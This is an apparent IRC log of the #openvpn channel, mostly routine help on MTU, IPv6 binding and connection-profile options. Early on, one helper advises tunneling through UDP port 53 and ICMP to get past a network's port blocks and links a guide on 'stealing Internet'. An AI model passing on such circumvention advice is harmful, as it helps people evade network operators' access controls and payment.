TCP listener 21:06 < njbair> USB is flaky on the Pi. But if you plug in a powered hub it's great 21:06 < Poster> oh could be, I don't own one yet, I should though 21:06 < Poster> sorry excuse for a geek =[ 21:06 < njbair> I own 2 21:07 < njbair> not played much with them, though 21:07 < Poster> I did some work with OpenWRT on the Routerboard RB411 21:07 < Poster> that worked well 21:08 < njbair> OpenWRT has some great capabilities 21:08 < njbair> but we needed something a bit more stable for the office, so I chose DD-WRT instead 21:08 < Poster> yeah I used it with an old atheros minipci card for some wireless goodness 21:10 < njbair> DD-WRT is one of those projects that always seems dead, but isn't 21:11 < Poster> it seems pretty mature 21:11 < Poster> not sure what major changes would come down in the past few years 21:11 < njbair> Mainly, device support 21:12 < Poster> yeah, I could see that 21:18 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 21:45 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Quit: Leaving] 22:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 22:22 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:23 -!- Gustaffs [~gh55738@46.165.221.13] has joined #openvpn 22:24 < Gustaffs> Hi guise.. just a question... for Wimax what would be a good mtu? 22:25 < Gustaffs> because openvpn drops my connection frequently... I'm not sure if it is because of packet loss or something else 22:25 < Poster> have you tried something like a continuous ping? 22:25 < Poster> to compare against? 22:25 < Gustaffs> yup 22:25 < Gustaffs> it is stable 22:25 < Gustaffs> no packet loss 22:25 < Poster> are you using UDP? 22:26 < Gustaffs> yup port 53 22:26 < Poster> ok try switching to UDP 22:26 < Poster> oops, TCP I meant 22:26 < Gustaffs> Can't do it 22:26 < Gustaffs> hehe 22:26 < Poster> oh you're piercing through 22:26 < Gustaffs> because it would be of no use for me 22:26 < Gustaffs> yup 22:26 < Gustaffs> lol 22:26 < Poster> I've had that too 22:26 < Poster> it's probably rate limiting upstream 22:26 < Poster> what client OS are you using? 22:27 < Gustaffs> Linux 22:27 < Poster> that can be a tough one, but you may be able to do something using tc to introduce some latency 22:27 < Poster> and find the sweet spot of the rate limiter 22:28 < Poster> http://stackoverflow.com/questions/614795/simulate-delayed-and-dropped-packets-on-linux 22:28 <@vpnHelper> Title: tcp - Simulate delayed and dropped packets on Linux - Stack Overflow (at stackoverflow.com) 22:28 < Gustaffs> yup I already tried that... and also I setup frag to 1450 which was supposed to be the right tunning 22:28 < Poster> you might need to go really low 22:29 < Gustaffs> like 500? 22:29 < Gustaffs> xD 22:29 < Poster> I believe per RFC, DNS is supposed to switch to TCP for responses over 512 bytes 22:29 < Poster> so figuring in the overhead, maybe 450 or so 22:29 < Gustaffs> I see.... let me try that 22:29 < Gustaffs> let me try on the other computer 22:30 < Gustaffs> with the wimax dongle 22:30 < Poster> have you tried 80 or 443 tcp? 22:30 < Gustaffs> yup no go :( 22:30 < Gustaffs> they have it blocked 22:30 < Poster> gotcha 22:30 < Gustaffs> so I can only go through 53 udp 22:30 < Poster> those are sometimes open 22:31 < Poster> I assume you've tried 53/tcp also? 22:31 < Gustaffs> yup I tried 80, 8080, 9090, 443, 53 tcp 22:31 < Gustaffs> and same for udp 22:31 < Gustaffs> and just 53 udp works 22:31 < Poster> yeah I have had a few of those too 22:31 < Gustaffs> on wifi it works sweet 22:32 < Gustaffs> but just with wimax :( 22:32 < Poster> yeah I think I was somewhere that wanted me to pay 22:32 < Gustaffs> also I was thinking that it could be the link quality 22:32 < Poster> pings are relatively small 22:32 < Gustaffs> any way to improve link quality or get statistics on linux for wimax 22:32 < Poster> I think there's also ICMP tunneling 22:32 < Poster> though I don't know how secure it really is 22:32 < Poster> you'd probably want to wrap something inside it 22:33 < Gustaffs> I did with a cocacola can 22:33 < Gustaffs> lol 22:33 < Gustaffs> Coke 22:34 < Poster> http://neverfear.org/blog/view/9/using_icmp_tunneling_to_steal_internet 22:34 <@vpnHelper> Title: NEVERFEAR.org - Using ICMP tunneling to steal Internet (at neverfear.org) 22:35 < Gustaffs> cool 22:35 < Gustaffs> let me check it 22:35 < Gustaffs> thx 22:36 < Poster> I would probably run a TCP flavor of OpenVPN through it though, it looks like it just forwards TCP 22:37 < Poster> so you'd either need to use a TCP based VPN link or jump into various proxies 22:38 < Gustaffs> pretty nice article 22:38 < Poster> probably good to put some sensible filtering on the other side too 22:39 < Gustaffs> totally :) 22:40 < Gustaffs> let me try something... probably that would be better... I'll connect from another computer to stay on IRC while I try with wimax here 22:41 < Poster> ok good luck 22:41 < Gustaffs> thx bro :) 22:42 < Poster> np! 22:46 -!- Gustaffs [~gh55738@46.165.221.13] has quit [Quit: Leaving] 22:48 -!- Gustaffson [~dell@tsn109-201-135-220.dyn.nltelcom.net] has joined #openvpn 22:49 < Poster> any luck? 22:50 < Gustaffson> well, it is connected to the vpn 22:50 < Gustaffson> no errors yet 22:50 < Gustaffson> i forgot to setup verb to 6 22:50 < Gustaffson> frag 480 22:50 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has joined #openvpn 22:51 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has quit [Read error: Connection reset by peer] 22:51 < Poster> oh, you're on the UDP OpenVPN link? 22:51 < Gustaffson> error already.... FRAG_IN error flags=0xfa2a187b 22:52 < Gustaffson> yup with the other computer 22:52 < Gustaffson> with wimax 22:52 < Gustaffson> not loading websites and it gives me the error mentioned above 22:52 < Gustaffson> FRAG TEST not implemented 22:53 < Poster> have you tried lowering the mtu? 22:53 < Gustaffson> yup but it always disconnected me with Backtrack errors 22:54 < Gustaffson> should I try something like tun-mtu 1400 and fragment 600 ? 22:55 < Poster> I would go much lower, 450 or so 22:56 < Poster> the other thing you can maybe try would be to leave the MTU alone 22:56 < Poster> then start sending ICMP echo requests through, slowly increasing their size 22:56 < Gustaffson> alright :) 22:56 < Poster> until you start dropping or getting errors 22:56 < Poster> I don't really know what you're going through, I've experienced similar behaviors 22:57 < Poster> I think it's probably a matter of tweaking the size and possibly introducing latency to keep it from kicking in 22:57 < Poster> I am imagining it is some type of traffic policing that once hit will drop frames 22:58 < Gustaffson> gotcha 22:58 < Poster> where we need to implement shaping in a sense to keep it under that threshold 22:58 < Gustaffson> pretty cool... makes sense 22:58 < Poster> get that a lot of time on dedicated lines 22:58 < Gustaffson> could you give me an example of a good ping for icmp echo request? 22:58 < Gustaffson> i mean on how to start.... 22:59 < Poster> ok you're using a Linux client correct? 22:59 < Gustaffson> yup 23:00 < Poster> ok so try something like 23:00 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 23:00 < Poster> ping www.google.com 23:00 < Poster> across the link 23:00 < Poster> watch for drops or errors from OpenVPN 23:00 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:00 < Poster> then start creeping the size up 23:00 < Poster> ping -s 100 www.google.com 23:00 < Poster> see how it goes 23:00 < Poster> slowly bringing the size up until you hit errors 23:00 -!- master_o1_master [~master_of@p4FF24F5D.dip.t-dialin.net] has joined #openvpn 23:00 < Poster> appears to be about 28 bytes overhead in an icmp echo request 23:01 < Gustaffson> oh gotcha... i know how to ping :P i just didnt know the packet size to start with hehe 23:01 < Poster> oh, sorry =[ 23:01 < Poster> <- Captain Obvious 23:01 < Gustaffson> no packet loss ... 35 sent 35 received and lol time is 38446ms :o 23:01 < Poster> goodness 23:01 < Gustaffson> lol no wonder hahahahhaa feel dumb now 23:02 < Poster> that's rough 23:02 < Gustaffson> that is hell of a latency right there lol 23:02 < Poster> yep 23:02 < Poster> I'd maybe try the icmp tunnel 23:02 < Gustaffson> yup I'll give it a shot 23:02 < Gustaffson> and THANK YOU bro 23:02 < Gustaffson> sorry for being that dumb lol haha 23:02 < Poster> need to bail for the evening, good luck! 23:02 < Poster> np ; have fun 23:02 < Gustaffson> take care man 23:02 < Gustaffson> see ya! 23:02 -!- Gustaffson [~dell@tsn109-201-135-220.dyn.nltelcom.net] has left #openvpn [] 23:04 -!- master_of_master [~master_of@p4FF245E4.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 23:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:55 -!- corretico [~luis@190.211.93.38] has joined #openvpn 23:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] --- Day changed Tue Mar 19 2013 00:00 -!- xbanux [~xbanux@triband-mum-59.182.164.172.mtnl.net.in] has joined #openvpn 00:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 255 seconds] 00:24 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds] 00:33 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 01:05 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Read error: Connection reset by peer] 01:06 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 01:11 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 252 seconds] 01:16 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 01:29 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 01:36 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 01:44 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:45 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza] 01:49 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 256 seconds] 01:50 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has quit [Ping timeout: 256 seconds] 01:50 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Ping timeout: 256 seconds] 01:52 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn 01:55 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has joined #openvpn 01:55 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has quit [Changing host] 01:55 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 02:15 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 02:17 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 02:17 -!- mode/#openvpn [+o mattock_afk] by ChanServ 02:17 -!- mattock_afk is now known as mattock 02:19 -!- hatschi [~marvin@dslb-188-098-207-219.pools.arcor-ip.net] has joined #openvpn 02:26 -!- mattock is now known as mattock_afk 02:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:33 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn 02:33 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host] 02:33 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:35 -!- mattock_afk is now known as mattock 02:48 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 02:50 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 02:55 -!- xbanux [~xbanux@triband-mum-59.182.164.172.mtnl.net.in] has quit [Read error: Connection reset by peer] 02:55 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 03:16 -!- brute11k [~brute@89.249.235.131] has joined #openvpn 03:23 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 276 seconds] 03:23 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 03:37 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 03:40 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 256 seconds] 03:40 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has quit [Ping timeout: 252 seconds] 03:46 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has joined #openvpn 03:55 < jzaw> ecrist EugeneKay im looking at the ipv6 for openvpn 03:55 < jzaw> am i misunderstanding something cos it seems you still have to have ipv4 for ipv6 to pass down the tunnel? 03:57 < pekster> Correct. Currently the code assumes that all clients have an IPv4 address, and it's non-trivial to change that at the moment (maybe 2.4.x will do so, but that's yet to be determined) 03:57 < jzaw> ah thanks pekster 03:57 < jzaw> i was pulling my hair out thinking my google-fu had finally left me ! 03:58 < jzaw> scary i know 03:58 < pekster> It sholdn't be a problem to pick some obscure rfc1918 network if you really don't want/need IPv4 at all 03:58 < jzaw> just for tunnel ends? 03:58 < pekster> Right 03:59 < jzaw> but it still only connects via ipv6 in its entirety ? 03:59 < jzaw> so endpoints have both ipv4 and 6 ips 03:59 < pekster> I thought you were taling about the tunneled traffic... 04:00 < jzaw> im doing that now ... routing ipv6 down an established ipv4 tunnel 04:00 < jzaw> but id like to establish a tunnel on ipv6 only ... is that possible? 04:01 < pekster> For the inside or outside IPs is what I'm trying to get at 04:01 < jzaw> there are hosts out there that are ipv6 only .... ie loopsofzen.co.uk 04:02 < jzaw> if by outside you mean the config stages ... thats what im after 04:02 < pekster> And what are you trying to do? Reach a host like that, or connect to an openvpn server running on it? 04:03 < jzaw> ie the server (server-ipv6)only has an ipv6 addy .. say 04:03 < jzaw> connect to a ovpn server on that 04:03 < jzaw> if it had a server 04:04 < jzaw> loopsofzen cant be reached by ipv4 ... unless youre doing some 6to4 or what ever but then youre still only reaching via ipv6 04:04 < pekster> Looks like that's not supported at preasent. It's bound to 0.0.0.0:1194 for me, and attempts to bind it to my IPv6 address specifically seem to fail 04:05 < jzaw> ah so cant bind to :::1194 04:05 < pekster> If you goal is to *reach* a host like that, just connect to a tunneling service that provides you IPv6. This could be HE, sixxs.net, or an openvpn tunnel where you get an IPv6 address 04:05 < pekster> That works fine over OpenVPN 04:05 * jzaw nods 04:05 < jzaw> i have ipv6 both native (at home) and HE here 04:06 < pekster> Sure. I use openvpn get an address on my sixxs.net allocation when I'm not at home 04:06 < pekster> I use openvpn anyway, so it was natural to have it feed me a v6 address too (what else am I going to do with a /48...) 04:06 < jzaw> indeed 04:07 < jzaw> and ive actually got part of my /48 from home vpn'd to here (Poland) 04:07 < jzaw> its funny to firewall myself way way over there in the uk 04:08 < jzaw> the thing i was wanting to setup was independent ipv4 and ipv6 tunnels 04:08 < jzaw> so if i borked up my ipv4 settings either end i could still get in and admin via ipv6 (securely) 04:08 < pekster> Attempting to bind to an IPv6 address with the --local directive fails: 04:08 < pekster> RESOLVE: Cannot resolve host address: fe80::a44:1: Address family for hostname not supported 04:08 < jzaw> what addy were you trying to use there? 04:09 < pekster> An arbitrary link address I added 04:09 < pekster> fe80::/10 is link-local. You can add whatever you want there 04:10 * jzaw nods 04:10 -!- zz_AsadH is now known as AsadH 04:10 < pekster> It doens't with with my globally routable address either, fwiw 04:10 < jzaw> what about a real global pekster 04:10 < pekster> Yea, I tried it too. It doesn't matter (if it did, a massive bug somewhere would have just been uncovered) 04:11 < pekster> IPv6 "doesn't care" in the least 04:12 < pekster> Although I suppose it could if you assigned the same IP on multiple links. Linux knows how to deal with them as long as they're unique. Windows outright refuses 04:13 < jzaw> wouldnt that be an effective bridge? 04:13 < pekster> ? 04:13 < jzaw> same ip on multiple links 04:13 <@EugeneKay> No. 04:14 < pekster> fe80::/10 is special. Plenty of RFC to read on that point 04:14 < pekster> It's scoped per-link 04:14 < jzaw> k :) 04:14 <@EugeneKay> Bridging combines broadcast domains. Having the same IP on multiple NICs doesn't do that by itself 04:15 < jzaw> so no go on ipv6 tunnels at the mo 04:15 < jzaw> i see EugeneKay 04:25 < pekster> I'll have to poke at it more later, but the function throwing that error message is actually IPv6-supported, but many of its callers aren't 04:27 < jzaw> cool ta 04:29 < pekster> Actually, maybe it's just the assumption in_addr_t() makes. Too late for me to poke at this now, but I'll see if I can't make some sense of the code later. Feel free to check for a bugreport on the topic at openvpn.net under the community portal and file one if there isn't one there already 04:29 < jzaw> will look thx :) 04:37 -!- brute11k [~brute@89.249.235.131] has quit [Read error: Connection reset by peer] 04:38 < hatschi> pekster: hi 04:39 < hatschi> pekster: we had a discussion last week about an fragmentation issue. can you remember this? 04:39 < pekster> Let's assume not. 04:40 -!- brute11k [~brute@89.249.235.131] has joined #openvpn 04:41 < hatschi> pekster: we tried it to reproduce it with a minimal config. and after some time i was able to reproduce the issue with a minimal config, but it seems that you have been away from your machine by this time. maybe you have read my follow up or not... 04:41 < pekster> Oh, sounds vaugly familiar. You had to use a connection profile, right? 04:42 < hatschi> yes, that was it ;) 04:42 < hatschi> when using connection profiles 2.3 forget's about the fragmentation, while 2.2 is honouring it... 04:43 < pekster> That stuff tends to be ephemeral for the duration of a conversation. However, I believe reading some note that global options specified *before* a connection profile would be used by all of them 04:43 < hatschi> for my setup it was no big deal to remove the connection profiles because it was a relict from former time, but i don't know how to handle this - if this is a bug or a feature. 04:44 < pekster> Depends on if it works poperly when the fragmentation options are placed above (ie: not below, or "after") the profile itself 04:44 < hatschi> then it sounds like a feature ;) 04:44 < hatschi> lets see if my test vm's are still alive... 04:44 < pekster> Official builds of 2.3.0 won't work with --verb 4 to show you or I'd suggest you try that. Building git master will (my patch that fixed this was commited recently) or you could wait until 2.3.1 comes out which should have it 04:45 < pekster> If you can reproduce it in 2.2.2, that's a valid test case; did your minimal test config do the right thing when a 2.2.2 client used it? 04:46 < hatschi> yes, it works wit 2.2.? - currently i don't know if the former version was 2.2.1 or 2.2.2... 04:46 < pekster> 2.2.2 -> 2.3.0 04:46 < pekster> For official releases anyway 04:48 < pekster> See if 2.3.0 works with the frag stuff above your profile. If not, it's probably a bug (filing your minimal config files in the bug tracker at openvpn.net would be wise in such a case, after checking for an existing bug, of course) 04:51 < hatschi> pekster: iv'e just tried it with my vm's: even placing fragment before the connection profile doesn't help - i still get the fragment errors on the server. 04:52 < pekster> Can you file a bugreport then? Include the server config, and the working/not-working minimal test cases you have? Be sure to note versions used (2.3.0 I think on your client, verses that it worked *with* the connection profiles as expected under 2.2.2)? 04:53 < pekster> That would keep it on the radar, where IRC isn't exactly a form of "reliable delivery" ;) 04:53 < hatschi> hmm. 04:54 < hatschi> now it's going to get interesting. i can't get back to a working config... 05:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:03 < hatschi> okay. i was wrong - there was another openvpn client process running on the test machine that was mixing up everything. 05:04 < hatschi> final results are: fragmentation works if the statements are before the connection profile, but not after for 2.3 05:04 < pekster> And that's consistent with the documentation I found 05:04 < pekster> I think under the connection profile part of the manpage 05:06 < hatschi> okay. i've missed this one and it seems to have been an issue for at least 2.2.1 - do you have a 2.2.2 binary that could work with centos ? 05:07 < hatschi> s/it seems to have been an issue/it seems not to have mattered 05:08 < hatschi> nevertheless it works as designed so we don't have a bug in 2.3 ;) 05:08 < pekster> I don't. rpmforge might, or the usual places. Building your own from source isn't that hard, moreso if you can just grab the srpm from $upstream for 2.2.1 and just bring build 2.2.2 the same way 05:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 05:12 < hatschi> do you think we should put so much effort in a 'probably existing config parsing bug' of an older version? okay, we have a few scenario's stumbling into (like me) when upgrading from 2.2 to 2.3 but what to do if we fix it for 2.2.3? then we have the issues when doing a minor upgrade, and i think that would hurt harder… ;) 05:14 < pekster> Right. If there's not a bug in 2.3.0 it's probably of less interest. Presumably it could be back-ported, but if someone is upgrading to 2.2.whatever (whatever >2) 2.3.0 might as well be used. IMO anyway 05:15 < pekster> Then again, maybe it's an easy change. Until someone decides to track down the issue, it remains a mystery. I have enough code I'm more interested in hacking at that it's less of a concern for me personally, especially if 2.3.0 works. And I care even less if there's no official bug to refer to ;) 05:19 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Ping timeout: 255 seconds] 05:19 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 255 seconds] 05:19 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds] 05:19 -!- lbft [~lbft@199.195.249.177] has quit [Ping timeout: 260 seconds] 05:19 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 260 seconds] 05:19 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 255 seconds] 05:19 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Ping timeout: 255 seconds] 05:19 -!- dvl [~dan@pdpc/supporter/active/dvl] has quit [Ping timeout: 255 seconds] 05:19 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 260 seconds] 05:19 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 05:19 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 260 seconds] 05:20 -!- bla [bla@vivane.thera.be] has joined #openvpn 05:20 -!- bla [bla@vivane.thera.be] has quit [Changing host] 05:20 -!- bla [bla@unaffiliated/bla] has joined #openvpn 05:20 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Quit: changing servers] 05:20 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 05:20 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 05:20 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Remote host closed the connection] 05:20 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 05:20 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 05:20 -!- tyteen4a- [tyteen4a03@69.50.229.69] has joined #openvpn 05:20 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 05:20 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 05:20 -!- lbft [~lbft@199.195.249.177] has joined #openvpn 05:20 -!- corretico_ [~luis@190.211.93.38] has joined #openvpn 05:21 < hatschi> pekster: just fetched a 2.2.2 from the 'usual sources' and: it honours the fragmentation statement below the connection policy, like 2.2.1 did. 05:21 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn 05:21 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 05:21 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 05:21 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Excess Flood] 05:21 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 05:21 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 05:21 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 05:21 < pekster> Right. If that chance to support it above the profile was made betwen 2.2 and 2.3, that sounds fair 05:22 < pekster> The solution for >=2.3.0 systems is to put the settings all profiles need above the profiles 05:22 < pekster> Unless I missed something 05:26 < hatschi> yes, that's right. 05:26 < hatschi> i just searched track but i didn't find an issue that could match the symptoms we found... 05:26 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:28 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 05:30 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 05:30 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 05:35 -!- dpecka [~dpecka@193.165.171.107] has left #openvpn [] 05:37 -!- dazo_afk is now known as dazo 05:40 < hatschi> https://community.openvpn.net/openvpn/ticket/267 05:40 <@vpnHelper> Title: #267 (Configuration: fragementation statements after connection profiles honored by mistake) – OpenVPN Community (at community.openvpn.net) 05:49 -!- csaba [~csaba@195.199.154.25] has quit [Quit: Távozom] 06:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 06:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 06:12 -!- go [~puck@unaffiliated/go] has joined #openvpn 06:13 < go> hi everyone 06:13 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 06:13 < go> is there a howto through which i could setup multiple connections to different severs? I have a debian server and i want to connect to server1 and server2 at the same time. 06:14 <@EugeneKay> Just start openvpn multiple times. Most distro's init scripts will start all .conf files in /etc/openvpn/(debian included) in alphabeticalish order 06:14 <@EugeneKay> You'll need to make sure that the confs(IPs mostly) don't conflict with each other 06:16 < go> those won't, but the ports won't be an issue? 06:16 <@EugeneKay> If you're running in client mode you shouldn't have any problem with the local source port 06:16 <@EugeneKay> If you're forcing a particular source port then you will need to make those non-conflicting 06:16 <@EugeneKay> But that's silly :-p 06:17 < go> I am in client mode, so I guess all should be good and the interfaces should be alright too, right? 06:18 <@EugeneKay> Specifying the same tun# device in multiple configs will give you problems in the same fashion; specify 'device tun' and it'll auto-allocate an available #ed device 06:18 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Quit: Oh noes the internet broke.] 06:18 < go> okay, thank you very muhc 06:19 < pekster> jzaw: Figured it out. You need --proto udp6 06:21 < pekster> That's ill documented in the manpage, so I'll see if I can't submit a patch to clean up the docs. The code supports it, although it was not exactly straight forward to get to that feature from the resolver error that occurs when you feed it an IPv6 --local address with --proto udp 06:25 < go> EugeneKay: I'm getting "TCP/UDP: Socket bind failed on local address [undef]: Address already in use" 06:25 < go> i have two .conf files 06:26 < go> both conf files have the ports setup in them 06:26 < pekster> If these are client configs, you likely want the 'nobind' option 06:26 < pekster> If they're servers, you should explicitly configure them to listen on a different IP+port tupple 06:27 < go> they are clients 06:28 < go> okay, checking how to add the nobind option to the config files 06:28 < go> if I just remove the "port 1194" part and add "nobind", it should be okay? 06:29 < go> yupp, that was it, thank you very much (: 06:29 < pekster> No, you need the 'port' directive (at least if you didn't include the optional port in your remote statement.) 'nobind' works in addition to that 06:29 < pekster> Ah, well, 1194 is also the default, so in that case it would work anyway 06:30 < go> thank you for your help pekster and EugeneKay 06:30 -!- go [~puck@unaffiliated/go] has left #openvpn [] 06:31 <@EugeneKay> Yeah, I think I said that :-p 06:32 < pekster> 1194 is the default, so in effect the "forced" default is --lport 1194 --rport 1194 06:40 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has joined #openvpn 07:11 -!- dazo is now known as dazo_afk 07:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Connection reset by peer] 07:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:20 -!- dazo_afk is now known as dazo 07:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:35 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 257 seconds] 07:51 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 08:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Remote host closed the connection] 08:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:10 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 08:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:18 -!- dvl [~dan@nyi.unixathome.org] has quit [Quit: I shouldn't really be here - dircproxy 1.0.5] 08:21 -!- mattock is now known as mattock_afk 08:29 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 08:30 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 08:32 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 260 seconds] 08:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:42 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 08:43 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 264 seconds] 08:44 -!- [fred] [fred@konfuzi.us] has joined #openvpn 08:46 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 08:51 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 08:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:56 -!- mattock_afk is now known as mattock 08:59 -!- mattock is now known as mattock_afk 09:01 -!- corretico_ [~luis@190.211.93.38] has quit [Ping timeout: 276 seconds] 09:04 -!- mattock_afk is now known as mattock 09:31 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:34 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has quit [Ping timeout: 245 seconds] 09:36 -!- Juzzy [Xinu@107-194-81-122.lightspeed.nsvltn.sbcglobal.net] has joined #openvpn 09:43 -!- hatschi [~marvin@dslb-188-098-207-219.pools.arcor-ip.net] has quit [Quit: hatschi] 09:57 -!- markovh [markov@unaffiliated/markovh] has joined #openvpn 09:58 < markovh> !welcome 09:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 09:58 <@vpnHelper> 